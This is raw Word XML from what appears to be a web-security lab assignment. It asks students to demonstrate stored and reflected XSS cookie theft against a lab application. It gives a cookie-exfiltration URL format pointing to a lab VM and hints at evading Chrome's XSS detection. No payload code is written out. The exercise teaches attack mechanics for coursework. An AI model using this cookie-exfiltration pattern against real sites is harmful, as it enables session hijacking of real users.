          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> use the above </w:t>
      </w:r>
      <w:r w:rsidR="002F2B03">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>address</w:t>
      </w:r>
      <w:r w:rsidR="002F2B03" w:rsidRPr="009709B4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> and format</w:t>
      </w:r>
      <w:r w:rsidR="002F2B03">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> with your own IP address but not mine</w:t>
      </w:r>
      <w:r w:rsidR="00AB5DD9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> just like what you did in the last question.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7338C051" w14:textId="77777777" w:rsidR="00367EAF" w:rsidRPr="001F2BDA" w:rsidRDefault="00367EAF" w:rsidP="001F2BDA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1152"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6336E56D" w14:textId="77777777" w:rsidR="001F2BDA" w:rsidRPr="001F2BDA" w:rsidRDefault="001F2BDA" w:rsidP="001F2BDA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1152"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F2BDA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Hint: there could be multiple solutions. One simple solution is to simply add a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C0C6621" w14:textId="77777777" w:rsidR="001F2BDA" w:rsidRPr="001F2BDA" w:rsidRDefault="001F2BDA" w:rsidP="001F2BDA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1152"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F2BDA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>redirectpage.htm webpage in the XSS directory; you don’t need to change malURL.htm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12B6F089" w14:textId="77777777" w:rsidR="001F2BDA" w:rsidRPr="001F2BDA" w:rsidRDefault="001F2BDA" w:rsidP="001F2BDA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1152"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F2BDA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>because redirectpage.htm has been specified in it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6881B341" w14:textId="77777777" w:rsidR="00D86FC9" w:rsidRDefault="00D86FC9" w:rsidP="00AD5AC4">
      <w:pPr>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F366481" w14:textId="528236EB" w:rsidR="00AD5AC4" w:rsidRDefault="00AD5AC4" w:rsidP="00AD5AC4">
      <w:pPr>
        <w:ind w:left="10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Question 7: (15 points)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34BA6D33" w14:textId="77777777" w:rsidR="001F2BDA" w:rsidRDefault="001F2BDA" w:rsidP="000F51A8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B06F83">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Describe the details of your solution. If you use the redirectpage.htm solution,</w:t>
      </w:r>
      <w:r w:rsidR="008F633F" w:rsidRPr="00B06F83">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B06F83">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>please provide the content of this file. What are your verification results?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EFC0A2D" w14:textId="77777777" w:rsidR="00F45AA2" w:rsidRDefault="00F45AA2" w:rsidP="008D5453">
      <w:pPr>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="561F5995" w14:textId="77777777" w:rsidR="003217FA" w:rsidRDefault="003217FA" w:rsidP="008D5453">
      <w:pPr>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0BBC7F13" w14:textId="77777777" w:rsidR="00001AF1" w:rsidRDefault="00D768A2" w:rsidP="00905CFD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00001AF1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Basically, the above two links illustrated the persistent (or stored) XSS attacks. That is,</w:t>
      </w:r>
      <w:r w:rsidR="00AA39AD" w:rsidRPr="00001AF1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00001AF1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>if an attack can store those links on your legitimate webpages or websites, they can</w:t>
      </w:r>
      <w:r w:rsidR="00AA39AD" w:rsidRPr="00001AF1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00001AF1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>perform attacks such as cookie stealing. This XSS Web application is also vulnerable</w:t>
      </w:r>
      <w:r w:rsidR="00AA39AD" w:rsidRPr="00001AF1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00001AF1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>to non-persistent (or reflected) XSS attacks. In this task, demonstrate that the above</w:t>
      </w:r>
      <w:r w:rsidR="00AA39AD" w:rsidRPr="00001AF1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00001AF1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>cookie stealing attacks can happen by using reflected XSS attacks. In other words,</w:t>
      </w:r>
      <w:r w:rsidR="00AA39AD" w:rsidRPr="00001AF1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00001AF1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>reflected XSS attacks can also send the cookie stored on your browser for this website</w:t>
      </w:r>
      <w:r w:rsidR="00AA39AD" w:rsidRPr="00001AF1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00001AF1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">to an attacker’s server (that’s my </w:t>
      </w:r>
      <w:r w:rsidR="00466F44">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>VM</w:t>
      </w:r>
      <w:r w:rsidRPr="00001AF1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>) using an HTTP GET request with the</w:t>
      </w:r>
      <w:r w:rsidR="00AA39AD" w:rsidRPr="00001AF1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00001AF1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>following format:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5963BC7D" w14:textId="77777777" w:rsidR="00D768A2" w:rsidRPr="00001AF1" w:rsidRDefault="00D86FC9" w:rsidP="00001AF1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1152"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId11" w:history="1">
        <w:r w:rsidR="00E940ED" w:rsidRPr="00C42527">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          </w:rPr>
          <w:t>http://192.168.65.128/XSS/stealcookie.php?info=COOKIES</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00E940ED">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6242F747" w14:textId="77777777" w:rsidR="000F47F4" w:rsidRDefault="000F47F4" w:rsidP="000F47F4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1152"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E153FE7" w14:textId="77777777" w:rsidR="00D768A2" w:rsidRDefault="00D768A2" w:rsidP="00E860C5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1152"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D768A2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Note: </w:t>
      </w:r>
      <w:r w:rsidR="00851131" w:rsidRPr="009709B4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">you </w:t>
      </w:r>
      <w:r w:rsidR="00851131">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>need to</w:t>
      </w:r>
      <w:r w:rsidR="00851131" w:rsidRPr="009709B4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> use the above </w:t>
      </w:r>
      <w:r w:rsidR="00851131">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>address</w:t>
      </w:r>
      <w:r w:rsidR="00851131" w:rsidRPr="009709B4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> and format</w:t>
      </w:r>
      <w:r w:rsidR="00851131">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> with your own IP address but not mine just like what you did in the last question</w:t>
      </w:r>
      <w:r w:rsidR="00F66170">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="504143FA" w14:textId="77777777" w:rsidR="00A91FCE" w:rsidRPr="00E860C5" w:rsidRDefault="00A91FCE" w:rsidP="00E860C5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1152"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72D9BD76" w14:textId="77777777" w:rsidR="00D768A2" w:rsidRDefault="00D768A2" w:rsidP="00144F25">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1152"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D768A2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Hint: you don’t need to make any change to this existing XSS Web application. You</w:t>
      </w:r>
      <w:r w:rsidR="00144F25">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D768A2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>simply need to demonstrate the vulnerability by cleverly constructing input to this XSS</w:t>
      </w:r>
      <w:r w:rsidR="00144F25">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D768A2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Web application.</w:t>
      </w:r>
      <w:r w:rsidR="00346ED6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Probably Google Chrome browser will detect your XSS attacks, then you will need to </w:t>
      </w:r>
      <w:r w:rsidR="005A55E1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">restart your Google Chrome browser with a </w:t>
      </w:r>
      <w:r w:rsidR="008F5F44">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">specific </w:t>
      </w:r>
      <w:r w:rsidR="005A55E1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">flag or simply </w:t>
      </w:r>
      <w:r w:rsidR="00346ED6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">change to </w:t>
      </w:r>
      <w:r w:rsidR="00BA45D6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">another browser such as </w:t>
      </w:r>
      <w:r w:rsidR="00346ED6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Firefox.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07CA27C0" w14:textId="77777777" w:rsidR="00AB4938" w:rsidRDefault="00AB4938" w:rsidP="00657B3B">
      <w:pPr>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26464A6F" w14:textId="3EDEE37E" w:rsidR="00D768A2" w:rsidRPr="00D768A2" w:rsidRDefault="00D768A2" w:rsidP="00657B3B">
      <w:pPr>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D768A2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Question 8: (15 points)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71A253D2" w14:textId="77777777" w:rsidR="001D4DFA" w:rsidRDefault="00D768A2" w:rsidP="00657B3B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D768A2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Describe the details of your attacks (including the input you used). What are your verification</w:t>
      </w:r>
      <w:r w:rsidR="001C39C3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001C39C3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>results?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B7694C6" w14:textId="77777777" w:rsidR="00A10B9C" w:rsidRDefault="00A10B9C" w:rsidP="00A10B9C">
      <w:pPr>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F3668F1" w14:textId="77777777" w:rsidR="00A44C29" w:rsidRPr="00A10B9C" w:rsidRDefault="00A44C29" w:rsidP="00A10B9C">
      <w:pPr>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00A44C29" w:rsidRPr="00A10B9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2F1A33"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3B940B04"/>
    <w:lvl w:ilvl="0" w:tplc="A21EF58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C7D594C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B2223274"/>
    <w:lvl w:ilvl="0" w:tplc="802454B8">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="(%1)"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="115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72" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="0409001B" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="2592" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="0409000F" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3312" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="04090019" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4032" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="0409001B" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="4752" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="0409000F" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5472" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="04090019" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6192" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="040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2" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="102F1207"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3B940B04"/>
    <w:lvl w:ilvl="0" w:tplc="A21EF58A">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="(%1)"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="280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528" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="0409001B" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="4248" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="0409000F" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4968" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="04090019" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5688" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="0409001B" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="6408" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="0409000F" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7128" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="04090019" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7848" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="0409001B" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%9."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="8568" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="3" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="13F838B3"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A1E68E4C"/>
    <w:lvl w:ilvl="0" w:tplc="54FEFA30">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="(%1)"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="115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72" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="0409001B" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="2592" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="0409000F" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3312" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="04090019" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4032" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="0409001B" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="4752" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="0409000F" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5472" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="04090019" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6192" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="040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" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="16113353"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8FB6D360"/>
    <w:lvl w:ilvl="0" w:tplc="04090019">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%1.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5" w15:restartNumberingAfterBreak="0">
